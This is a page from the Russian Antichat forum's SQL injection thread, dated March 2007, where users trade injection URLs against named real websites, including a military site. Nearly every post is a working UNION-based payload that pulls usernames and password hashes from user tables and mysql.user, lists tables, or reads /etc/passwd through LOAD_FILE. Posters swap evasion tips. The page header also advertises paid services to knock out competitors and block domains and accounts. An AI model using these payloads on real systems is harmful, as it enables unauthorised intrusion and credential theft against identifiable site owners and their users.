Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 70 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#691

06.03.2007, 00:09

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

http://www.tniad.mil.id/news.php?id=-377%20union%20select%201,2,table_name,4,5,6,7,8,9, 0,1,2,34%20from%20information_schema.tables/*

Цитата:

http://www.pythom.com/news.php?id=1193%20union%20select%201,2,3,4,5,6,7/*

))

#692

06.03.2007, 00:21

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

kamaz

Код:

http://www.pythom.com/news.php?id=1193%20union%20select%201,user,password,4,5,6,7+from+mysql.user+limit+1,2/*

Код:

http://www.pythom.com/news.php?id=1193%20union%20select%201,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7+from+mysql.user/*

Код:

http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),email),6+from+users/*

Пароли не нашёл

Код:

http://privet.zp.ua/place.php3?id=-1+union+select+1/*

Код:

http://www.ajsquare.com/demo/forum_demo/topic_title.php?&head_id=20&td_id=-1%20union%20select%200,1,2,3,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),6,7,8,9,1,1,2,2,2%20from%20members/*&page=1

Последний раз редактировалось Goudini; 06.03.2007 в 00:39.. Причина: more sql-inj's

#693

06.03.2007, 00:51

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://www.voyage-luxe.ru/chapter532.html?uid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4,5,6,7+from+mysql.user/*

уух) долго возился..
без криптования не катит =d
логин и hash в тайтле окна)
//upd:

Код:

http://www.voyage-luxe.ru/chapter8.html?uid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),4,5+from+mysql.user+limit+1,1/*

Последний раз редактировалось n1†R0x; 06.03.2007 в 01:20..

#694

06.03.2007, 00:57

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Код:

http://www.diac.ru/news/comments.php?news_id=-99+union+select+1,concat(convert(login+using+cp1251),0x3a,convert(password+using+cp1251)),3,4,5,6,7,8+from+clients/*&sortirovka=id

Код:

http://relaxmusic.info/news_print.php?ntpl=1&print_id=-99+union+select+1,2,table_name,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Последний раз редактировалось ice1k; 06.03.2007 в 01:06..

#695

06.03.2007, 01:33

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Первый Альтернативный Музыкальный Телеканал

Код:

http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,user(),4,5/*

#696

06.03.2007, 01:41

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

2 n0ne
баянище =)

Цитата:

http://www.ecom-info.spb.ru/law/print.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26/*

вот вам, убивайте себе моск. там пятая версия =)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#697

06.03.2007, 01:42

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Цитата:

Сообщение от n0ne

Первый Альтернативный Музыкальный Телеканал

Код:

http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,user(),4,5/*

сколько можно =\ уже раз 10ый наверно написали =\

#698

06.03.2007, 01:49

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Spyder, ice1k, да все в тэгах постят, по поиску не найдешь)) а листать каждый раз лениво, так что извиняйте.

#699

06.03.2007, 01:51

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

2Goudini
http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6+from+frb_user_login/* вот пассы ток хз от чего, а вообще кажеться что пассы в таблицы users лежат в колонке sifra

#700

06.03.2007, 01:51

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Цитата:

Сообщение от n0ne

Spyder, ice1k, да все в тэгах постят, по поиску не найдешь)) а листать каждый раз лениво, так что извиняйте.

и вот хоть один бы, кроме этого...:

Код:

-1163+union+select+1,2,user(),4,5/*

... 4ё-нить бы написал путнего =\

Страница 70 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход